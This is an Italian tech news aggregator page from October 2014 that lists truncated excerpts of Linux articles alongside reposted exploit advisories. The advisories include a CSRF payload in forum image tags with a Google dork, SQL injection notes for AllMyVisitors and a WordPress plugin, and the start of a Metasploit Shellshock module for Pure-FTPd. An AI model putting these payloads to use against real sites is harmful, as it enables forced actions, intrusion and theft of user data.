RBS Change Complet Open Source Cross Site Request Forgery

3 ottobre 2014 - Fonte: http://www.mondounix.com
# Exploit Title: RBS Change Complet Open Source CSRF
# Google Dork: intext:"une réalisation rbs"
# Date: 10/01/2014
# Exploit Author: KrustyHack
# Vendor Homepage: http://www.rbschange.fr/
# Software Link: http://www.rbschange.fr/addons/distributions/RBS-Change-complet-Open-Source,67203.html
# Version: 3.6.8
# Tested on: Linux
 
HOW TO
======
 
Just add [img="http://CSRF"][/img] on forum signature or forum posts.
 
TEST
====
 
Based on demo.rbschange.fr:
---------------------------
 
[img="http://server/fr/deconnexion/"][/img]
 
Will disconnect all users who load the image.
 
Other example:
--------------
 
[img="http://www.example.com/log.php"][/img]
 
<?php
$ip...

Leggi il seguito »

AllMyVisitors 0.5.0 SQL Injection

3 ottobre 2014 - Fonte: http://www.mondounix.com
AllMyVisitors0.5.0 Blind SQL Injection Vulnerability
====================================================
Author : indoushka
Vondor : http://www.php-resource.net/
Dork:    Copyright (c) 2004 by voice of web
==========================
 
SQL injection is a vulnerability that allows an attacker to alter back-end SQL statements by manipulating the user input. An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn't properly filter out dangerous characters. 
 
This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it is relatively easy to protect against, there is a large number of web applications vulnerable.
This...

Leggi il seguito »

PUBBLICATO IL MANUALE “MEEP – TEORIA, SINTASSI ED ESERCIZI PROGETTUALI”

3 ottobre 2014 - Fonte: http://www.sourceslist.eu



MEEP TEORIA, SINTASSI ED ESERCIZI PROGETTUALI

 

Cari lettori,

da quando ho iniziato a lavorare non ho avuto molto tempo per continuare a postare notizie su questo blog e per portare avanti i diversi progetti che ho sviluppato fino a qualche tempo fa con la collaborazione di diversi appassionati del mondo GNU/Linux.

Vi scrivo questo post per comunicarvi che nella giornata odierna...

Leggi il seguito »

Installare Boot Repair in Ubuntu 14.04, 14.10 e derivate

3 ottobre 2014 - Fonte: http://www.lffl.org/
In questa guida vedremo come installare correttamente Boot Repair in Ubuntu 14.04 Trusty e 14.10 Utopic
Boot Repair in Ubuntu Il bootloader è uno strumento indispensabile per il nostro sistema operativo dato che ci consente di avviare correttamente la nostra distribuzione. Può capitare per svariati motivi che il nostro bootloader Grub non funzioni correttamente segnalandoci ad esempio errori all'avvio di una distribuzione oppure...

Leggi il seguito »

Google: il successo di Chromebook nelle scuole statunitensi

3 ottobre 2014 - Fonte: http://www.lffl.org/
Google ha presentato il nuovo servizio Drive for Education indicando che Chromebook ha superato il 50% del mercato scolastico statunitense.
Google ChromebookDopo un'inizio non troppo entusiasmante, i nuovi personal computer Chromebook / Chromebox targati Google stanno finalmente...

Leggi il seguito »

Script – bad interpreter: No such file or directory

2 ottobre 2014 - Fonte: http://www.guidepc.it

Linux

Quando ci troviamo a scrivere uno script (bash, perl o altro) e lanciandolo otteniamo l’errore
bad interpreter: No such file or directory

Se questo errore è preceduto dal path di esecuzione (nel nostro caso /bin/bash, ma potrebbe differire) come il seguente

/bin/bash^M:

il problema è molto semplice ed è dovuto al passaggio dello script tra sistemi operativi: il sistema non riesce ad eseguire lo script perchè non riesce ad interpretare correttamente il codice. In particolare il simbolo ^M ci indica...

Leggi il seguito »

WordPress Content Audit 1.6 Blind SQL Injection

2 ottobre 2014 - Fonte: http://www.mondounix.com
Details
================
Software: Content Audit
Version: 1.6
Homepage: http://wordpress.org/plugins/content-audit/
Advisory report: https://security.dxw.com/advisories/blind-sqli-vulnerability-in-content-audit-could-allow-a-privileged-attacker-to-exfiltrate-password-hashes/
CVE: CVE-2014-5389
CVSS: 3.6 (Low; AV:N/AC:H/Au:S/C:P/I:N/A:P)
 
Description
================
Blind SQLi vulnerability in Content Audit could allow a privileged attacker to exfiltrate password hashes
 
Vulnerability
================
An attacker with an admin account is able to add arbitrary text in the “Audited content types” option by using a DOM inspector to modify the value of a checkbox field. This text is then inserted into an SQL query and...

Leggi il seguito »

Pure-FTPd External Authentication Bash Environment Variable Code Injection

2 ottobre 2014 - Fonte: http://www.mondounix.com
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::Ftp
  include Msf::Exploit::CmdStager
 
  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'Pure-FTPd External Authentication Bash Environment Variable Code Injection',
      'Description'     => %q(
        This module exploits the code injection flaw known as shellshock which
        leverages specially crafted environment variables in Bash. This exploit
        specifically targets Pure-FTPd when configured to...

Leggi il seguito »

Porting Ubuntu Touch – lista dei dispositivi

2 ottobre 2014 - Fonte: http://www.inthebit.it

Ubuntu Touch non è ancora del tutto maturo per l’uso quotidiano, tuttavia è possibile installarlo su dispositivi Nexus sin dalle prime release: sul sito ufficiale, troviamo infatti i vari Nexus supportati, la guida all’installazione e la guida per effettuare un porting. Ovviamente effettuare un porting può risultare complicato e anche rischioso, ma per fortuna ci hanno già pensato vari membri su XDA a portare Ubuntu...

Leggi il seguito »

Adobe Reader per Linux scompare silenziosamente dal sito ufficiale

2 ottobre 2014 - Fonte: http://www.chimerarevo.com

Iniziamo questo articolo con un’insolita domanda: quanti di voi, su Linux, si sono presi la briga di installare ed utilizzare Adobe Reader per la visualizzazione dei PDF, visti i tanti visualizzatori e gestori alternativi disponibili sia nei repository che nativamente integrati nei vari ambienti desktop?

Adobe Reader per Linux

Per quanto la risposta possa sembrare scontata esistono comunque degli utenti che, per “coerenza” o per necessità, si sono affidati anche in ambiente...

Leggi il seguito »